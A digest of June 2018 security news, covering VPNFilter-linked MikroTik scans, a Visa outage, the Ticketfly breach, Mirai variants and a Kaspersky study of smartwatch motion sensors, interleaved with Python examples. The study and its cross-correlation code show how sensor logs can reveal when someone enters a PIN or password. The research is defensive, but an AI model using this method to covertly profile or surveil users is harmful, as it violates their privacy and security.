“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts show threat actors targeting MikroTik routers on Ukrainian networks that have port 2000 exposed online.
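The detection logic JASK and GreyNoise describe, source IPs that scan exclusively for one port across many hosts, is straightforward to reproduce over SYN records. The following is an added example and is not JASK's or GreyNoise's own tooling; the log format (timestamp, source, destination, destination port) and the addresses in it are constructed for illustration, and the `min_targets` threshold is an assumption.

```python
"""
Flag source IPs whose SYN traffic goes exclusively to TCP port 2000 (the port
associated with MikroTik devices in the JASK report) across many destination
hosts. Added example; the log format and addresses below are constructed.
"""
from collections import defaultdict

# Constructed SYN records: "timestamp src_ip dst_ip dst_port" (not real telemetry)
SAMPLE_SYN_LOG = """\
2018-06-01T10:00:01 198.51.100.7 203.0.113.10 2000
2018-06-01T10:00:01 198.51.100.7 203.0.113.11 2000
2018-06-01T10:00:02 198.51.100.7 203.0.113.12 2000
2018-06-01T10:00:02 198.51.100.7 203.0.113.13 2000
2018-06-01T10:00:03 198.51.100.7 203.0.113.14 2000
2018-06-01T10:00:03 192.0.2.44 203.0.113.10 80
2018-06-01T10:00:04 192.0.2.44 203.0.113.10 443
2018-06-01T10:00:04 192.0.2.44 203.0.113.10 2000
2018-06-01T10:00:05 198.51.100.9 203.0.113.10 2000
2018-06-01T10:00:05 198.51.100.9 203.0.113.10 2000
"""


def parse_syn_log(text):
    """Parse whitespace-separated SYN records into (ts, src, dst, dport) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port = line.split()
        records.append((ts, src, dst, int(port)))
    return records


def find_single_port_scanners(records, port=2000, min_targets=3):
    """Return source IPs that only ever probed `port` and hit at least
    `min_targets` distinct hosts on it. A host that also talks to other
    ports (192.0.2.44 above) is ordinary traffic and is not reported."""
    ports_by_src = defaultdict(set)
    targets_by_src = defaultdict(set)
    for _, src, dst, dport in records:
        ports_by_src[src].add(dport)
        if dport == port:
            targets_by_src[src].add(dst)
    return sorted(
        src for src in ports_by_src
        if ports_by_src[src] == {port} and len(targets_by_src[src]) >= min_targets
    )


if __name__ == "__main__":
    scanners = find_single_port_scanners(parse_syn_log(SAMPLE_SYN_LOG))
    print("exclusive port-2000 scanners:", scanners)
```

The `min_targets` cut-off is what separates a sweep from a single device that legitimately talks to port 2000 once; in production the same grouping would be run per network prefix (the report's "Ukrainian networks") rather than globally.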

The VPNFilter malware is very sophisticated and implements many capabilities typical of nation-state malware, such as wiping firmware, communicating via Tor, monitoring traffic, and targeting ICS devices.

The US authorities blamed the Russia-linked APT28 hacking group for the creation of the botnet. Ukrainian organizations must be vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.


Visa payments DOWN: Millions affected by a service disruption
2.6.2018 securityweek Hacking

The Visa card payment system is suffering a widespread outage across Europe; millions of users have been unable to make payments using their cards.
Shoppers and travelers across Europe have been unable to pay with their cards since around 2.30pm on Friday.

At the time of writing, Visa confirmed the widespread problems but did not provide any details on the cause.

Visa and major banks also informed their customers through social media, while major retailers confirmed that customers were not able to pay with their cards.

The problems suffered by Visa are also affecting MasterCard and Amex, because the two services were rerouting some transactions via Visa’s IT network.

Visa UK (@VisaUK), 6:49 PM - Jun 1, 2018:
“We are currently experiencing a service disruption which is preventing some Visa transactions in Europe from being processed. We are investigating the cause and working as quickly as possible to resolve the situation. We will keep you updated.”

Bank of Ireland (@bankofireland), 5:19 PM - Jun 1, 2018:
“We are aware some customers are experiencing Visa debit card issues. This is impacting multiple banks across Europe. We will update when we know more. Cash withdrawals can be made at any BOI ATM.”

“We are unable to accept Visa card payments currently. No retailers are able to accept Visa cards.” said Marks & Spencer.


Ticketfly website was compromised, the hacker also stole customers’ data
2.6.2018 securityweek Hacking

The website of the events ticketing company Ticketfly was shut down after a hacker who calls himself “IsHaKdZ” compromised it.
The hacker defaced the Ticketfly website with a picture of Guy Fawkes and a warning that read “Your Security Down im Not Sorry.” The attacker also published a yandex.com email account along with the following message:

“Ticketfly HacKeD By IsHaKdZ. Your Security Down im Not Sorry. Next time I will publish database ‘backstage’ (sic).”

The hacker also warned administrators that he has access to a database titled “backstage,” and shared links to files containing customer and client information, including names, physical addresses, phone numbers and email addresses.

Ticketfly, which is owned by Eventbrite, has taken down the site in response to the incident and posted a data breach notification.

“We are currently investigating a cybersecurity incident targeting Ticketfly.com that has resulted in the compromise of some client and customer information. After learning of the incident, we immediately launched an investigation, and out of an abundance of caution, we took the site down while we work to address the issue,” reads the data breach notification published by the company.

“Out of an abundance of caution, we have taken all Ticketfly systems temporarily offline as we continue to look into the issue. We are working to bring our systems back online as soon as possible,”

Troy Hunt (@troyhunt), 6:38 AM - May 31, 2018:
“Seeing a lot of tweets about a breach at @ticketfly right now: https://twitter.com/search?q=ticketfly&src=typd …”

Everyone who has purchased tickets via the Ticketfly platform will have to print them out and bring a photo ID to the venue hosting the event. Ticketfly provides printed guest lists to the venues.

People who have tickets purchased by other people may need to show the original payment card used to buy the ticket, a copy of the original buyer’s ID, and an authorization note from the original buyer.

Motherboard has spoken with the hacker, who confirmed that he had initially attempted to contact the company to report a vulnerability in the website, without success. He asked for a payment of 1 bitcoin to disclose the issue and, after receiving no reply, decided to exploit the flaw.

Motherboard confirmed the authenticity of at least some of the records stored in the files leaked by the hacker.

“In an email conversation with Motherboard, the hacker claimed to have warned Ticketfly of a vulnerability that allowed him to take control of “all database” for Ticketfly and its website.” wrote Lorenzo Bicchierai on Motherboard. “The hacker said they asked for 1 bitcoin to share the details of the vulnerability but did not get a reply. The hacker shared what appears to be two emails between him and a series of Ticketfly employees in which the hacker mentions the vulnerability.”

The company confirmed that it is still investigating the issue in order to determine the extent of the security breach.

“Our investigation into the incident is ongoing. We’re putting all of our resources to confirm the extent of the unauthorized access. We’re committed to communicating with all customers once we have more information about the scope of the issue,” Ticketfly told customers in the notification.


Crooks expand the original Mirai botnet code base with new capabilities and improvements
2.6.2018 securityweek  CyberCrime

Cybercriminals continue to improve the infamous Mirai botnet by adding new exploits and functionality; experts warn that new, more dangerous variants will appear in the wild.
According to Netscout’s Arbor Security Engineering and Response Team (ASERT), cybercriminals continue to improve the dreaded Mirai IoT botnet by adding new exploits and functionalities.

The time to market for new Mirai botnet versions is shrinking drastically: in a few months experts spotted at least four Mirai variants in the wild, Satori, JenX, OMG and Wicked.

Malware authors (vxers) are using the leaked Mirai source code to create their own versions, a trend that worries security experts.

“Using Mirai as a framework, botnet authors can quickly add in new exploits and functionally, thus dramatically decreasing the development time for botnets. The Mirai source is not limited to only DDoS attacks. A variant of Satori was discovered which attacks Ethereum mining clients.” states the report published by Netscout.

Below are the key findings for the new Mirai variants:

Satori uses remote code injection exploits to implement its scanning feature.
The JenX bot evolved from Mirai and shares much of its code, but its authors removed the scanning and exploitation capabilities.
The OMG bot adds HTTP and SOCKS proxy capabilities.
The Wicked Mirai exploits RCE flaws to infect Netgear routers and CCTV-DVR devices. When vulnerable devices are found, a copy of the Owari bot is downloaded and executed.
Cybercriminals will continue to use Mirai variants to build large botnets; for this reason, experts recommend that organizations apply proper patching, updates, and DDoS mitigation strategies to protect their infrastructure.

“As seen with the four samples covered above, botnet authors are already using the Mirai source code as their building blocks. As the explosion of IoT devices does not look to be slowing down, we believe we’ll continue to see increases in IoT botnets.” concluded the report.

“We are likely to see remnants of Mirai live on in these new botnets as well.”


Trojan watch

1.6.2018 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how the proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned our attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.

From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.

In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although the signals from the embedded sensors we investigated cannot (yet) be used to emulate “traditional” keyloggers, they can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity of cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.

So, first things first.

Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.

For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).

Logging smartwatch signals during password entry

To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory — to obtain cross-correlation values that were more or less satisfactory required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not be that much, but not for hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.

Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.

But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s², and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.

Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals

The graph contains five areas in which different patterns are clearly visible. For those versed in kinematics, this graph says a lot about the user.

The most obvious motion pattern is walking. We’ll start with that.

When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.

Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).

Accelerometer and gyroscope readings during walking

In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows, up to the integration constants (initial velocity and coordinates), that the person was walking somewhere, with varying characteristic velocity.

Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)

Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.

Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes
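The double integration the article relies on is two cumulative integrals (acceleration to velocity, velocity to displacement), each carrying an unknown integration constant. The code below is an added example, not Kaspersky's software: it uses the article's 100 Hz sampling rate, a constructed one-axis acceleration profile rather than real watch data, and a constant sensor offset to show why the authors call the method "primitive": an uncorrected bias grows quadratically into phantom travel.

```python
"""
Double numerical integration of accelerometer samples (trapezoidal rule).
Added example; the acceleration profile and the bias value are constructed.
"""
SAMPLE_RATE_HZ = 100            # sampling frequency used in the article
DT = 1.0 / SAMPLE_RATE_HZ


def integrate(samples, dt=DT, initial=0.0):
    """Cumulative trapezoidal integral; `initial` is the integration constant."""
    out = [initial]
    acc = initial
    for prev, cur in zip(samples, samples[1:]):
        acc += 0.5 * (prev + cur) * dt
        out.append(acc)
    return out


def displacement_from_acceleration(accel, dt=DT, v0=0.0, x0=0.0):
    """Return (velocity, position) series; v0 and x0 are the unknown constants."""
    velocity = integrate(accel, dt, v0)
    position = integrate(velocity, dt, x0)
    return velocity, position


def constructed_profile():
    """1 s at +1 m/s^2, 1 s coasting, 1 s at -1 m/s^2: one forward step of ~2 m."""
    return [1.0] * 100 + [0.0] * 100 + [-1.0] * 100 + [0.0]


def final_displacement(accel, bias=0.0):
    """Displacement at the end of the log; `bias` models a constant sensor offset."""
    _, pos = displacement_from_acceleration([a + bias for a in accel])
    return pos[-1]


def bias_drift(bias, seconds, dt=DT):
    """Phantom displacement produced by a constant offset with no real motion."""
    n = int(seconds / dt) + 1
    _, pos = displacement_from_acceleration([bias] * n, dt)
    return pos[-1]


if __name__ == "__main__":
    profile = constructed_profile()
    print("true-ish displacement  :", round(final_displacement(profile), 3), "m")
    print("with 0.05 m/s^2 bias   :", round(final_displacement(profile, 0.05), 3), "m")
    print("bias alone over 60 s   :", round(bias_drift(0.05, 60), 1), "m")
```

The last line is the practical caveat: a 0.05 m/s² offset, invisible in the raw trace, becomes 90 m of fictitious displacement after one minute, which is why the article's "thousands of meters" is a rough figure and why step counting (anthropometric stride estimates) is what trackers actually use.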

It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods: the orientation of the watch does not change, yet there is acceleration, which suggests that the person is moving by car (or elevator).

Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of transport that moves in a straight line but with stops. What is it? Some sort of public transportation?

Accelerometer data when traveling on public transport

Here’s another time slice.

Pattern 3, accelerometer data

This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.

Below we interpret all the areas on the graph.

Accelerometer and gyroscope readings with decoding of areas

These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.

Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.

Experiment               max (cor) Ax   max (cor) Ay   max (cor) Az   max (cor) Wx   max (cor) Wy   max (cor) Wz
Walking1 and Walking2    0.73           0.70           0.64           0.62           0.41           0.83
Walking1 and Noise       0.33           0.30           0.32           0.30           0.33           0.33

Maxima of the cross-correlation functions of the walking patterns with each other and with an arbitrary noise pattern

It can be seen from the table that even this elementary approach of calculating cross-correlation functions allows us to identify the user’s movement patterns within their “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example principal component analysis, which is expected to work quite well in determining the characteristic parts of the signal log.

What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.

Without data on the orientation of the X and Y axes in space (most likely different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts that indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest. But this too is outside the scope of our study.

Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.

PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.

Accelerometer signals when entering a PIN code on an ATM keypad

Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.

Experiment                        max (cor) Ax   max (cor) Ay   max (cor) Az   max (cor) Wx   max (cor) Wy   max (cor) Wz
One person and different tries    0.79           0.87           0.73           0.82           0.51           0.81

Maxima of the cross-correlation functions for PIN entry data at an ATM

Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.

Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.

Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.

We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.

In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).

Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer

To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.

Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer

When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!

Attempts to enter a smartphone unlock code by two different people

It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.

But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.

The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.

Experiment           max (cor) Ax   max (cor) Ay   max (cor) Az   max (cor) Wx   max (cor) Wy   max (cor) Wz
One person           0.92           0.63           0.71           0.55           0.76           0.96
Different persons    0.65           0.35           0.31           0.23           0.37           0.76

Maxima of the cross-correlation functions for password input data entered by different people on a desktop computer

Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.

Experiment                           max (cor) Ax   max (cor) Ay   max (cor) Az   max (cor) Wx   max (cor) Wy   max (cor) Wz
One person and different activity    0.32           0.27           0.39           0.26           0.30           0.44

Maxima of the cross-correlation functions for different activities (password entry vs. usual surfing)

Experiment           max (cor) Ax   max (cor) Ay   max (cor) Az   max (cor) Wx   max (cor) Wy   max (cor) Wz
One person           0.64           0.47           0.56           0.41           0.30           0.58
Different persons    0.33           0.40           0.40           0.32           0.38           0.34

Maxima of the cross-correlation functions for an unlock code entered by one person and by different people

Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.

However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!
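The statistic behind every table above (walking vs. noise, repeated PIN entry, password entry by the same or a different person, and password entry vs. surfing) is the maximum of a normalized cross-correlation over a range of lags, computed per axis. The block below is an added example and not Kaspersky's app or analysis code: it models a keystroke as a decaying impulse on six axes, the key-press instants, per-axis gains, jitter and noise are constructed assumptions, the "second person" simply types with a different rhythm, and the figures it prints are not the article's measurements. It shows the pure-Python arithmetic a watch-class CPU would need to run, and why the same-person rows come out high while different-person and different-activity rows stay low.

```python
"""
Normalized cross-correlation of six-axis smartwatch logs, per axis, with a
lag search, as used to recognise a repeated entry pattern. Added example;
the signals are synthetic and the parameters are assumptions.
"""
import math
import random

SAMPLE_RATE_HZ = 100
DT = 1.0 / SAMPLE_RATE_HZ
AXES = ("Ax", "Ay", "Az", "Wx", "Wy", "Wz")
# Relative amplitude of a keystroke impulse on each axis (assumption).
AXIS_GAIN = {"Ax": 1.0, "Ay": 0.6, "Az": 0.8, "Wx": 0.5, "Wy": 0.4, "Wz": 0.9}
DURATION_S = 3.2                  # ~ the article's 250-350 samples per attempt

# Hypothetical key-press instants (s) for a 13-character password: the template
# user, and a second person typing the same password with a different rhythm.
PERSON_A_KEYS = [0.20, 0.38, 0.55, 0.80, 0.97, 1.20, 1.45, 1.62, 1.90, 2.15, 2.33, 2.60, 2.78]
PERSON_B_KEYS = [0.25, 0.60, 0.70, 1.10, 1.30, 1.35, 1.80, 2.00, 2.05, 2.40, 2.55, 2.70, 2.95]


def simulate_attempt(key_times, seed, lag_s=0.0, jitter_s=0.01, noise_sd=0.05):
    """Six-axis log of one entry attempt: a 150 ms decaying impulse per key plus noise."""
    rng = random.Random(seed)
    n = int(DURATION_S * SAMPLE_RATE_HZ)
    log = {}
    for axis in AXES:
        sig = [rng.gauss(0.0, noise_sd) for _ in range(n)]
        for t in key_times:
            start = int(round((t + lag_s + rng.uniform(-jitter_s, jitter_s)) / DT))
            for k in range(15):
                if 0 <= start + k < n:
                    sig[start + k] += AXIS_GAIN[axis] * math.exp(-k / 5.0)
        log[axis] = sig
    return log


def simulate_browsing(seed, noise_sd=0.3):
    """Unstructured hand movement standing in for the article's 'usual surfing'."""
    rng = random.Random(seed)
    n = int(DURATION_S * SAMPLE_RATE_HZ)
    return {axis: [rng.gauss(0.0, noise_sd) for _ in range(n)] for axis in AXES}


def max_cross_correlation(x, y, max_lag):
    """Peak of the normalized (zero-mean) cross-correlation over lags in [-max_lag, max_lag]."""
    mx, my = sum(x) / len(x), sum(y) / len(y)
    x = [v - mx for v in x]
    y = [v - my for v in y]
    norm = math.sqrt(sum(v * v for v in x) * sum(v * v for v in y))
    if norm == 0.0:
        return 0.0
    best = 0.0
    for lag in range(-max_lag, max_lag + 1):
        lo, hi = max(0, -lag), min(len(x), len(y) - lag)
        s = sum(x[i] * y[i + lag] for i in range(lo, hi))
        best = max(best, s / norm)
    return best


def correlation_row(log_a, log_b, max_lag=50):
    """One row of the article's tables: max(cor) for each axis."""
    return {axis: round(max_cross_correlation(log_a[axis], log_b[axis], max_lag), 2)
            for axis in AXES}


def classify(log_a, log_b, threshold=0.6, max_lag=50):
    """Use the best axis as the decision statistic; True means 'same pattern'."""
    return max(correlation_row(log_a, log_b, max_lag).values()) >= threshold


if __name__ == "__main__":
    template = simulate_attempt(PERSON_A_KEYS, seed=1)
    trials = (("same person", simulate_attempt(PERSON_A_KEYS, seed=2, lag_s=0.20)),
              ("different person", simulate_attempt(PERSON_B_KEYS, seed=3)),
              ("surfing", simulate_browsing(seed=4)))
    for name, log in trials:
        print(f"{name:17s}", correlation_row(template, log))
```

The lag search is what makes the statistic usable on a watch: the second attempt is offset by 200 ms and still matches, while a different rhythm or unstructured movement does not. The whole computation is a few hundred thousand multiply-adds per comparison, well within what the article says a smartwatch can do on its own.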

Conclusions
Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.

The recorded signals can be transmitted by the phone to the attacker’s server whenever the latter has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that, in addition to this app, simply sending your geotag once and requesting the email address linked to your Google Play account is enough to determine, based on your movements, who you are, where you’ve been, your smartphone usage, and when you entered a PIN at an ATM.

We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).

We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.

A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).

Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.

Recommendations
There are several indications that an app downloaded onto a smartwatch might not be safe.

If, for instance, the app sends a request for data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address — but in this case you are at least free to enter an address different to that of the Google Play account to which your bank card is linked.
If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.
A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity with length up to dozens of hours and upload this data later.
In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.
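The first two recommendations are checks on what an app asks for, and they can be applied before installation by reading the manifest. The block below is an added example, not Kaspersky's tooling: the manifest is constructed, the package name is hypothetical, and the weights are an assumption for triage, not an Android rule. One caveat it encodes: accelerometer and gyroscope readings need no dangerous permission on Android, so a manifest that requests none of these still says nothing about sensor logging.

```python
"""
Manifest triage against the article's warning signs: account access
(GET_ACCOUNTS), location, and a network path to upload logs.
Added example; the manifest and the weights are constructed assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Permission -> (why it matters for this threat, triage weight). Weights are
# an assumption. Motion sensors themselves need no entry here: the
# accelerometer and gyroscope are readable without any dangerous permission.
SUSPICIOUS_PERMISSIONS = {
    "android.permission.GET_ACCOUNTS": ("identity: can link the motion log to the account owner", 2),
    "android.permission.ACCESS_FINE_LOCATION": ("geolocation: ties motion patterns to places", 2),
    "android.permission.ACCESS_COARSE_LOCATION": ("geolocation (coarse)", 1),
    "android.permission.BODY_SENSORS": ("raw body sensor access", 1),
    "android.permission.INTERNET": ("can upload logs to a server", 1),
}

# Constructed manifest for a hypothetical fitness app (not a real package).
CONSTRUCTED_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fitness.hypothetical">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <application android:label="Hypothetical Fitness"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """All <uses-permission android:name=...> values, sorted."""
    root = ET.fromstring(manifest_xml)
    return sorted(el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR))


def triage(manifest_xml):
    """Score the manifest and list the permissions that match the warning signs."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    findings = [(p, SUSPICIOUS_PERMISSIONS[p][0]) for p in perms if p in SUSPICIOUS_PERMISSIONS]
    score = sum(SUSPICIOUS_PERMISSIONS[p][1] for p, _ in findings)
    return {"package": root.get("package"), "score": score, "findings": findings}


if __name__ == "__main__":
    report = triage(CONSTRUCTED_MANIFEST)
    print(report["package"], "score", report["score"])
    for perm, why in report["findings"]:
        print("  ", perm, "-", why)
```

A fitness tracker that scores on both identity and location, as the constructed manifest does, is exactly the combination the article warns about; the mitigation it suggests (register with a throwaway or company address, deny the location permission) brings the score down without uninstalling the app.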


PE Firm Thoma Bravo Buys Majority Stake in LogRhythm
1.6.2018 securityweek IT

Private equity firm Thoma Bravo announced on Thursday that it will acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm.

Terms of the deal, which is expected to close in Q3 2018, were not disclosed.

Founded in 2003, LogRhythm is a veteran security firm that has raised more than $110 million in funding and has more than 2,500 customers around the world using its platform, which combines traditional SIEM capabilities with user and entity behavior analytics (UEBA).

